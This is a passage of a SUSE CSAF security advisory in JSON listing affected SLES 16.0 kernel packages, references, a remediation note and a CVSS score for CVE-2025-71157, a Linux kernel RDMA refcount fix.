"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
